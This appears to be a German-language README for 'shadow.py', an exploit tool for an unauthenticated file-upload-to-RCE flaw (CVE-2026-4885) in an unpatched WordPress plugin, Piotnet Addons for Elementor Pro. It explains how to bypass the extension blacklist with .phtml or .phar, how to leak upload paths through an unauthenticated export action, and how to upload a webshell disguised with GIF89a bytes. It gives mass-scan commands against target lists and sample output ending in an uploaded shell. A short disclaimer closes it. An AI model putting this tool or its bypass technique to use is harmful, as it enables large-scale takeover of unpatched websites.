
Piotnet Addons für Elementor Pro <= 7.1.70 – Nicht authentifizierter beliebiger Datei-Upload → RCE
Piotnet Addons für Elementor Pro <= 7.1.70 - Nicht authentifizierter beliebiger Dateiupload → RCE
Das Piotnet Addons für Elementor Pro Plugin für WordPress ist anfällig für beliebige Dateiuploads aufgrund fehlender Dateityp-Validierung in der pafe_ajax_form_builder Funktion in allen Versionen bis einschließlich 7.1.70. Das Plugin verwendet eine unvollständige Erweiterungs-Blacklist, die nur die Erweiterungen php, phpt, php5, php7 und exe blockiert, während gefährliche Erweiterungen wie .phar oder .phtml ungehindert hochgeladen werden können.
Dies ermöglicht es nicht authentifizierten Angreifern, beliebige PHP-Dateien auf dem Server der betroffenen Website hochzuladen, was zu Remote Code Execution (RCE) führt.
Hinweis: Der Exploit kann nur ausgelöst werden, wenn ein Dateifeld zum Piotnet-Formular hinzugefügt wurde.
~ CVSS-Wert : 9.8 (Kritisch)
~ CVSS-Vektor : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ Betroffene Versionen : <= 7.1.70
~ Patch : Kein Patch verfügbar
~ Öffentlich veröffentlicht : 18. Mai 2026
Der AJAX-Handler pafe_ajax_form_builder akzeptiert Dateiuploads ohne ordnungsgemäße Validierung:
// Unvollständige Blacklist – blockiert nur:
$blocked = ['php', 'phpt', 'php5', 'php7', 'exe'];
// .phtml, .phar, .shtml usw. passieren ungehindert ✓
Der Upload-Pfad ist über die nicht authentifizierte AJAX-Aktion pafe_export_database auslesbar → CSV-Export enthält vollständige Datei-URLs.
Interaktives Menü (Standard) :
python3 shadow.py
╾──── MENU ────╼
1 ▶ one target
2 ▶ mass scan
3 ▶ exit
[1/2/3] :
Einzelnes Ziel (CLI) :
python3 shadow.py -u https://target.com
python3 shadow.py -u https://target.com -s shell.phtml
Massenziele (CLI) :
python3 shadow.py -f targets.txt -t 20
python3 shadow.py -f targets.txt -t 20 -s shell.phtml
Optionen :
-u, --url Ziel-URL
-f, --file Datei mit Ziel-URLs (eine pro Zeile)
-s, --shell Benutzerdefinierte PHP-Shell-Datei (GIF89a wird automatisch vorangestellt)
-t, --threads Gleichzeitige Threads für den Massenmodus (Standard: 5)
-h, --help Hilfe anzeigen
form_id, post_id, field_name aus dem Seiten-HTMLpafe_export_database (keine Authentifizierung, kein Nonce)shell.txtBereiten Sie Ihre Shell-Datei lokal vor (z. B. shadow.phtml) – GIF89a-Magic-Bytes werden automatisch vorangestellt, falls sie fehlen.
Blockierte Erweiterungen:
.php.phpt.php5.php7.exeStattdessen verwenden:
.phtml.phar.shtml.php8usw.
╔══════════════════════════════════════════════════════════╗
║ ║
║ ♡ CVE-2026-4885 ║
║ Piotnet Addons for Elementor Pro <= 7.1.70 ║
║ Unauthenticated File Upload → RCE ║
║ ║
║ by Shadow & Friska ♡ ║
║ ║
╚══════════════════════════════════════════════════════════╝
╾──── VERSION ────╼
♡ v7.1.67 <= 7.1.70 — VULNERABLE
╾──── RECON ────╼
◆ scanning 46 pages (parallel)...
♡ [PIOTNET] https://target.com/contact
post_id=9 | form_id=72071c0
◆ using : https://target.com/contact
╾──── EXPLOIT ────╼
◆ post_id=9 | form_id=72071c0 | field=file
▶ trying .phtml ...
♡ uploaded (.phtml)
♡ URL leak : https://target.com/wp-content/uploads/piotnet-addons-for-elementor/shadow-xxx.phtml
╔══════════════════════════════════════════════════════════╗
║ ★ SHELL UPLOADED (.phtml) ║
║ ║
║ ◆ shell : https://target.com/wp-content/... ║
╚══════════════════════════════════════════════════════════╝
pip install httpx
Dieses Tool ist nur für ** Bildungs- und autorisierte Sicherheitstests** bestimmt.
Die unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.